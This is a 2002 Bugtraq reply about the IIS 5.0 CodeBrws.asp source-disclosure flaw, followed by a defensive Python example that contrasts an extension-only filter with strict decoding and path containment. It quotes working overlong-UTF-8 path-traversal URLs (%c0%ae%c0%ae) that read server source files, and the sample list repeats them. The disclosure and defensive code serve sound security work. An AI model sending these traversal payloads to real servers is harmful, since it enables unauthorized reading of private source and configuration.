[25118] in bugtraq
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
daemon@ATHENA.MIT.EDU (H D Moore)
Wed Apr 17 19:02:20 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: H D Moore <hdm@digitaloffense.net>
To: "Randy Hinders" <rahinders@hotmail.com>, sflist@digitaloffense.net,
bugtraq@securityfocus.com
Date: Wed, 17 Apr 2002 07:27:56 -0500
Cc: vulnwatch@vulnwatch.org
In-Reply-To: <F92SEs0wZPwW88XrFYC0000afe6@hotmail.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200204170727.56637.hdm@digitaloffense.net>

Right, you can only access files ending in the four "allowed" extensions.
These extensions are: .asp, .inc, .htm, and .html.

-HD

On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
> While checking various files and extensions I wanted to ensure that other
> files were still "protected" from this. I was not able to read the
> global.asa but was able to read (as expected) other asp pages.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
> Returned "View Active Server Page Source-- Access Denied" to the browser.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
> Returned the source code to the browser.
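
The behaviour discussed in this thread, as an added example (not code from either poster or from the IIS sample): an extension-only filter passes the quoted `%c0%ae%c0%ae` request, while strict UTF-8 decoding followed by canonicalization and a containment check rejects it. `VIEW_ROOT`, the function names, the lenient-decoder model and the last two sample values are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

ALLOWED_EXT = (".asp", ".inc", ".htm", ".html")  # the four extensions named in the thread
VIEW_ROOT = "/iissamples"                        # assumption: tree the viewer should serve

def extension_only_check(raw_value):
    """Model of a filter that inspects nothing but the file extension."""
    return raw_value.lower().endswith(ALLOWED_EXT)

def lenient_resolve(raw_value):
    """Model of a decoder that accepts overlong 2-byte UTF-8 (C0/C1 lead bytes)."""
    raw, out, i = unquote_to_bytes(raw_value), [], 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and raw[i + 1] & 0xC0 == 0x80:
            out.append(chr(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(raw[i]))
            i += 1
    return posixpath.normpath("".join(out))

def validate_source(raw_value):
    """Return (allowed, detail): strict decode, canonicalize, contain, then extension."""
    try:
        path = unquote_to_bytes(raw_value).decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return False, "invalid or overlong UTF-8"
    if "\x00" in path or "\\" in path:
        return False, "forbidden character"
    canon = posixpath.normpath("/" + path.lstrip("/")).lower()
    if not canon.startswith(VIEW_ROOT + "/"):
        return False, "outside view root"
    if not canon.endswith(ALLOWED_EXT):
        return False, "extension not allowed"
    return True, canon

# Constructed sample values; the first two are the Source values quoted in the thread.
SAMPLES = [
    "/IISSAMPLES/%c0%ae%c0%ae/global.asa",
    "/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp",
    "/IISSAMPLES/%2e%2e/iisstart.asp",
    "/IISSAMPLES/sdk/asp/docs/CodeBrws.asp",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, extension_only_check(s), lenient_resolve(s), validate_source(s))
```

The order of checks matters: the extension test runs last, on the canonical path, so it cannot be satisfied by a name that resolves outside the view root.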